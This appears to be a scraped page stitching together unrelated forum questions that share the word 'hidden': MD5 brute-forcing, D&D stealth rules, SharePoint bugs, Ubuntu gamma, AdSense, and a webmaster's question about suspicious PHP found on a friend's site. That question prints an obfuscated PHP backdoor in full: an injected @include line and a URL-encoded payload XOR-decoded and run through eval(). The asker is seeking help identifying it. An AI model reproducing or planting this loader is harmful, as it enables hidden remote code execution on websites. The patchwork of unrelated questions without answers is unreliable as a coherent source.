Securely displaying hidden integers with MD5

A system I’m trying to disprove security of uses the following mechanism: a 19-digit integer is hashed via the MD5 algorithm and the salt of the integer is shown in plain sight to the user before they take an irreversible action relevant to trying to guess the first 2 digits of said number.

Somehow, this screams of insecurity to me. With 10^19 possible results for each particular implementation and a 2-minute lifetime of a single entry, as well as capabilities of modern GPUs, I just don’t feel giving the okay to rolling this out.

My attempts to tackle it with a hashcat mask bruteforce with a somewhat high-end graphics card off my personal computer give very reassuring results of a time way exceeding two minutes, yet intuition seems to hint at something I’m missing.

Am I?

When attacking while hidden what does ‘give away location’ mean?


If you are hidden–both unseen and unheard–when you make an attack, you give away your location when the attack hits or misses.

Does this mean enemies attacking the hidden creature no longer have disadvantage as described in the proceeding paragraph?

When you attack a target that you can’t see, you have disadvantage on the attack roll. This is true whether you’re guessing the target’s location or you’re targeting a creature you can hear but not see. If the target isn’t in the location you targeted, you automatically miss, but the GM typically just says that the attack missed, not whether you guessed the target’s location correctly.

If the attacker then breaks line of sight and becomes unattackable, then next turn becomes partially visible do they once again for enemies to be at disadvantage or is the bonus still negated?

Can you move while Hidden?

Assuming you have successfully Hidden, can you:

  1. Continue to be not ‘clearly visible’ while moving and remain Hidden.
  2. Become ‘clearly visible’ while moving and remain Hidden.

In the Stealth section it says:

Make a Dexterity (Stealth) check when you attempt to conceal yourself from enemies, slink past guards, slip away without being noticed, or sneak up on someone without being seen or heard.

So you can definitely move unseen with a Stealth action, but is that allowed in the Hide action?

Hiding:

Until you are discovered or you stop hiding, that check’s total is contested by the Wisdom (Perception) check of any creature that actively searches for signs of your presence.

You can’t hide from a creature that can see you clearly, and you give away your position if you make noise, such as shouting a warning or knocking over a vase.

Passive Perception. When you hide, there’s a chance someone will notice you even if they aren’t searching. To determine whether such a creature notices you, the DM compares your Dexterity (Stealth) check with that creature’s passive Wisdom (Perception) score

The rules clearly state that in order to hide you only need to be ‘not clearly seen’ and it is successful if you beat the opponent’s Passive Perception. Your position is given away if you make noise (although you are not revealed). If an opponent takes the Search action to make a Perception check and beats your Stealth roll then you are discovered.

So the Hide action is a Stealth roll contested by Passive Perception. Creatures can contest the roll with the Search action using their Perception. Unless a creature opts to no longer be hidden, this is the only ways they can be revealed?

This seems to indicate that moving has no bearing on remaining hidden.

Does a creature know that it is hidden?

When a creature attempts to Hide it makes a Stealth check, which is compared to the passive Perception of opposing creatures that may notice it, or a group check if there is more than one.

Does the creature attempting to Hide know whether or not is has successfully hidden?

If an opposing creature decides to take the Search action, making a Perception check to attempt to detect the hiding creature, does the hiding creature know if they have remained hidden? Does the hiding creature know that the Search action has been taken?

News webpart layout breaks on resize while hidden

I have written a wrapper for native Sharepoint online News webparts which combines them into a tabbed layout. A result of this is that a number of the webparts are hidden most of the time. If the window is made smaller, the webparts rescale to fit the new dimensions but if the window is made larger again the hidden ones don’t rescale again.

Below is an image of the news webpart, properly scaled

enter image description here

And below is a picture of the problem occuring after a resize.

enter image description here

My initial thought was to fix this using css, but it doesn’t render all the content when it shows the compact layout.

Is there a way to force the webpart to resize? It doesn’t appear to respond to resizing of its parents and resizing the window is not allowed in most browsers.

Ubuntu has extra hidden gamma curve? (weird stuff…)

As soon as i loaded my test image i noticed the gradient was no longer smooth but it contained some vertical artifacts. I should point out that the gamma is set to default in Ubuntu: xgamma gamma 1.0

I also have Windblows 10 and OSX and there the gradient is smooth. However in Ubuntu it is brighter and contains vertical artifacts. And each time i take a screenshot, test image becomes brighter. This is driving me crazy.

So here is a test image: https://i.imgur.com/TflxhEi.png

When i open it on Win and OSX it is smooth and contains proper black. Here is a screenshot from Win10: https://i.imgur.com/uInvTgS.png

Here is a screenshot from Ubuntu (notice vertical artifact, less blacks, make sure to zoom in): https://i.imgur.com/9ZVoxnN.png

Here is a screenshot of a screenshot: https://i.imgur.com/avmdSmK.png

Here is a screenshot of a screenshot of a screenshot: https://i.imgur.com/kC8EF8a.png

The test image in the last example has become stupidly bright indicating there is another layer of gamma control present in the display settings that is just hidden from access.

Please keep in mind before you mention i should change gamma, this is all happening at gamma 1.0.

SharePoint 2013 Quick Edit while filtering hidden column shows error

I’ve got problem using quick edit while filtering by hidden column.

How to reproduce this error step by step:

  1. For example in Documents add new column (I called it TestCol, simple text)
  2. Add new element/document in list. Set value e.g. 1
  3. Using AllItems.aspx?FilterField1=TestCol&FilterValue1=1 will sort all items in list by this column. Quick edit here works fine.
  4. Hide this column (uncheck TestCol in Modify View).
  5. Now in view use Quick Edit.
  6. After changing name press Stop enter image description here
  7. Error shows up, page doesn’t redirect enter image description here enter image description here
  8. After clicking on that list (for me Documents) changes are shown.

I check in Fiddler and it shows status 601. Request looks like this

POST /TeamSite1/_layouts/15/inplview.aspx?List={574CD88A-97AE-4315-BBA8-2802AB1AC0B3}&View={0136CAE6-365B-4F6D-BF49-6DC1F6C8250B}&ViewCount=0&IsXslView=TRUE&IsCSR=TRUE&FilterField1=TestCol&FilterValue1=1&FilterField2=undefined&FilterValue2=1 HTTP/1.1

As you can see it adds at the end

&FilterField2=undefined&FilterValue2=1

In logs I found this:

System.ArgumentException: Column ‘undefined’ does not exist. It may have been deleted by another user.

Any idea how to resolve this problem?

How can I tell is the hidden PHP code inside of a GIf file is dangerous? [on hold]

I’m helping out a friend with a PHP website he has been running for a few years. He is not PHP developer, so he asked if I could help him out.

I download the contents of the server files onto my laptop and found a strange hex code embedded in the top of the page

<?php @include("4630773715a7537so24-20.7i6");?> 

This didn’t look like any PHP code I’d ever scene before so I decode it and it basically said ‘tvshows/images/sort-2x.gif’. And so I thought, “hmmm, that’s really weird”.

So when I go to the file is just PHP code. But here is the weird part. I huge file filled with URL Encoded Characters.

<?php $  _c62un = basename(trim(preg_replace(rawurldecode("%2F%5C%28.%2A%24%2F"), '', __FILE__)));$  _cx4pt = "~e2%1DC%5B%27%5D%02%1DNT%0A%00%06B%40%27B%08%0EA_O%3C%21a~Q%15jc%26%1A%01%1B%2B%5EW%0C%06%40%05%09%140%17%06_%5D%0A%5D%40EFCFIy%27r%11%40%0E6%15%16%1BZS%40S%00q%02%11%03%10%1A%06%1DB%5C%27Z%0E%04%03TCRD%04%09u%24%27%0C%14%01%00%00%2B_W%08A%15%1D%0F%1D%08ZD%04%09u%24%27%1A%03%070%06%1D%40W%27B%0E%04%0F%07GB%5D%16%3Fr%23m%00%00SGS%10HT%11%40%02%0DNT%09%1B%18Hm%08%5B%136%05%16%01%06%1BCF%0B%0E%40%40O~e%09y%27%12X%0EG%0D%03%15%06%1C%11%05%15%1EG%0B%0C9%03%1A%06%2BNW%16Z%08%07%12%00OUX%0D%03Q%15jckyORT%0D%16%0F%5D%00%00%01%0A%00RI%0D%15%1B%1F%03Y%05%16X%14Y%1DV%1CKJ%5DSC%5C_L%1DVM%03_ZPGXA%15%14%0BA%1F%5EN%5D~eRT%0D%12%1FB%08%0B%07%1FOV%03%5EU%11I%1E%06%5D~e%7F~%0D%12X%0E%0E%0FF%5BN%14%01CQ%0CG%08%079%16%17%1B%07YAP%09%01%00%0A%160%15%11Ym%1BA%09%1D%03%1D%1B%01S%04%1Bu%24GIFS%14%7F~%0D%12X%0EGIFS%09%07%1ANF%11A%09I%00%1A%03%17%2BJW%0Cq%04%06%08%07%0A%1C%00%5E%1A%5CV%13%00%01%09%08%5By%27%12X%0EGIFSO%09y%27%12X%0EGIFSORT%0D%12%5CE%0E%06%15%17%0E%0A%05%0D%0FXH%08%19%03%1DGV%0CY%5B%1FT%00EFQ%1DP%5D%16%3Fr%0EGIFSORT%0D%12X%0EC%1D%0E%02%18%02%15G%12E%0E%01%1B%03%12%0BZPF%5B%17%5D%03%08%1E%02CR%12D%5E%1D%5D%0E%13%03%5BK%0A%00DU%02IN%40%5D~eRT%0D%12X%0EGIFSOR%12N%5E%17%5D%02AB%18%06%1D%07IS%00_NRkyORT%0D%12X%0EGIFSO%00%11YG%0A%40GM%12%1B%1E%05%04LXC%23mIFSORT%0D%12%05%23mIFSO%0Fy%27%12X%0EG%0F%13%1D%0C%06%1DB%5CXM%10%19%09%15%19%16%5C%04%3Fr%0EGIF%08bxT%0D%12X%0EGIF%01%0A%06%01_%5CXZ%15%00%0B%5B%1F%00%11Jm%0AK%17%05%07%10%0AZV%02nP%00M5B%5CM%5ET%0A%15T%0E86%20%3A%237%2Br%1BQ%15jcFSOR%09%208u%24GIFS%09%07%1ANF%11A%09I%17%04%08%1D%0CD%5C%08%06C%1D%1F%1C%01%06%1F%40%1EX%0A%00%1D%10%0B%15%0A%1D%04%3Fr%0EGIF%08bxT%0D%12X%0EGIFW%03%05%1FK%5D%01ZGTFQMIy%27%3Fr%0EGIFSORTK%5D%0A%0EOM%1C%15%16%17%0DKY%09%13WRFW%15%14%0DHK%1EE%16IZS%1C%06%06AW%16%06C%1D%1F%1C%01%06%1F%40%1BC%07jcFSORT%0D%12XUjcFSORT%0D%12X%0EGIF%15%00%00T%05%16%0AJ%0A%13%0A%1ERBO%0D%16%0AJ%0A%13%0A%1ES%01%00_%5E%1D%40OM%01%07%19%0A%0EU%5BQ%0EAOFW%15%14%0DHK%1EE%16U%15%07%1D%1E%11C%1A%5CZ%1E%06%08%07%04%1F%5D%16%12%5C%5C%03%04%1C%1F%02Y_%01%12%5CT%01%10%03%0A%09%19%05%06%19Q%23mIFSORT%0D%12X%0EGI%1D~eRT%0D%12X%0EGIFSORT%0D%12X%0A%0B%1E%0D%15%00%0B%00%0D%1CE%0E%04%01%14%5B%00%00%10%05%16%0CW%08%07%12%18%02%29PWT%01K%1E%0F%0D%022%5BTs%12%17%5C%03AB%14%1B%04%0CWJ%11uC%1B%02%1E%15%1E%19p%1BQ%15jcFSORT%0D%12X%0EGIF%0EbxT%0D%12X%0EGIF%0Ebxy%27%12X%0EGIFSO%00%11YG%0A%40GM%0A%04%04%14%1BTFC%23mIFSO%0Fy%27%3Fr%0EGIF%15%1A%1C%17Y%5B%17%40G%03%04%01%01%02%01_%1A%5CZ%1E%06%08%07%04%1FX%0D%16%1FZ%11%11%1C%0B%06%5By%27%12X%0EG%12kyORT%0D%12X%0EG%0E%0A%1C%0D%13%18%0D%16%0F%5D%00%00%01%0A%00Iy%27%3Fr%0EGIFSORT_W%0C%5B%15%07F%02%18%15%1BU%5B%16%5EO%18%11%14%00%0A%1DCBP%0A%13%10%09%1D%1B%19%19%01%12%5CI%13%1F%1E%09%17%1B%5D%01%12%5CY%14%0E%0F%14%16%1D%5D%16%3Fr%0EGIF%0Ebxy%27%3Fr%0EGIF%15%1A%1C%17Y%5B%17%40G%00%0D%14%0B%10%1FT%1AQ%23mIFSO%09y%27%12X%0EGIFSOV%06_%5C%15O%10I%5BS%09%1B%18Hm%1FK%136%05%1C%01%06%11CF%0B%06%04%1E%16%1C%09%04%10%05%1BQ%15jcFSORT%0D%12X%0A%1E%08%15%1E%1F%08%1B%0D%0FX%5D%13%1B%16%1C%1CZP_%40%16C%06%1EJS%02%16A%05P%19%5D%02%07%07%1E%0AZ%17ZB%17H%11%0DNZF%5B%5D%16%3Fr%0EGIFSORTDTX%06C%10%07%00%02%02%0EB%12Y%13ZI%202%23%211%04%3Fr%0EGIFSORTV%3Fr%0EGIFSORT%0D%12X%0EC%0E%0C%12%04%00%1CKGX%13G%1A%13%11%1C%06%06%05%16%0A%5C%09%04%07%04CRPTS%0BC%17%13%09SDRB%19%1BC%23mIFSORT%0D%12X%0EGIB%1B%15%15%02XGX%13G%1C%08%00%0A%00%1DL%5E%11T%02A%0C%11%1D%1C%04X%40P%5C%06%1E%13%01%03%16%11N%5D%1CKOM%01%19%0E%19%06ET%0D%07KI%0B%17ZZ%16LA%1D%40%06%04%03%5B%0C%05%04BT%0EJO%40OZF%5BO%208X%0EGIFSOR%09%208X%0EGIFSOR%11AA%1D%23mIFSORT%0D%12%03%23mIFSORT%0D%12X%0EGIB%1B%15%15%02XGX%13G%28%14%01%0E%0B%5C%04%09u%24GIFSORT%0DOu%24GIFSORT%0D%40%1DZ%12%1B%08SK%1A%0EJD%0D%5B%5CdlSORTP%3Fr%23mIFSO%14%01CQ%0CG%08%07F%14%09%17%11CH%00%06C%19%0C%19%18%0B%03AKE%602%25%2AZbxT%0D%12XUjcFSORT%0D%12XH%08%1B%03%12%0C%1AT%05%5B%13I%03%0B%0D%0AG%5BTLAX%0A%00%0C%04%06%15%16%1D%0D%0FF%0EC%13%00%0A%0A%0B%12FC%16W%10%08%05%00%16%5By%27%12X%0EGIFSO%09y%27%12X%0EGIFSORT%0D%12%11HGAB%03%05%18%03TE%14WNdlSORT%0D%12X%0EGIFS%14%7F~%0D%12X%0EGIFSORT%0D%12X%0EG%00%00SG%01%00_Q%15%5EOM%16%19%05%05%0DZ%5E%01%02GM%01%16%0D%07%0EI%5BQ%0EZTFCF%7F~%0D%12X%0EGIFSORT%0D%12X%0EG%12kyORT%0D%12X%0EGIFSORT%0D%12X%0EGI%03%05%0E%1E%5C%09H%1EW%02%10%00%18%1E%1C%0DZS%1B%5D%1E%40%5D~eRT%0D%12X%0EGIFSORT%0D%12X%0EGIF%11%1D%17%15F%09u%24GIFSORT%0D%12X%0EGIFSO%0Fy%27%12X%0EGIFSORT%0D%12%05%23mIFSORT%0D%12X%0EGI%03%1F%1C%17y%27%12X%0EGIFSORT%0D%12%03%23mIFSORT%0D%12X%0EGIFSOR%11%5BS%14%06C%13%00%0A%0A%0B%12FC%16W%10%08%05%00%16%5BO%208X%0EGIFSORT%0D%12XSjcFSORT%0D%12XSjcFSOR%09%208u%24GIFS%08%14%11H%5C%02VO%40%5D~e%0F";eval(rawurldecode($  _cx4pt) ^ substr(str_repeat($  _c62un, (strlen($  _cx4pt)/strlen($  _c62un)) + 1), 0, strlen($  _cx4pt))); 

There’s more then just this, but the rest appears to be commented out. But it is thousands of characters long.

Now I tried to decode it, but it didn’t seem to make any sense to me. I uploaded the whole file to some site which said it could decode the thing, but it just returned a random .bin file.

My gut is telling me this is probably malware or possibly a virus. Any way I can verify what this is or how I can decode the enfire .gif file? Should I delete ASAP? Or is it harmless.

I know very little about security except to say this looks very suspicious to me.

Does Area of Effect spells reveal hidden or invisible enemies?

As a question that came up from this discussion about whether Mind Blank foils all attempts to gain information about the target, can area of effect spells be used to reveal enemies?

In the example of a fireball spell. Fireball does not have to target an enemy directly; the caster can specify a specific location, and the fireball effects the entire area within the spells radius.

But would that fireball reveal to the caster any hidden or invisible enemies or things in that area?

Using Google Adsense on Hidden Sections of Domain

I got a verified google adsense account a few years ago when I was running my own little blog which related to my web design business. I was then able to use the same registered account to set up ads on a music website that I created under a new dedicated domain.

Now, I’d like to use adsense on my new website, but its a little complicated as the pages are kind of hidden behind a wall.

Let me explain.

My domain is a business, and has no need for adsense on any of the main pages, but I’ve created a back end section (---.com/extra/), where pages that contain adsense banners will be placed.

There is no index page on /extra as the sites on there are all very differently themed and I generally don’t want to go to the hasstle of creating a main index page – Most visitors will come via searches and social media.

Any ideas on how I can make sure Google don’t flag my adverts for technically “hiding” my pages in this way?

Alternatively, are there any other ways to monetise a site like this without the use of banners? I like the idea of banner placement, but I’m all for trying other methods if they are more suited to the setup of my website.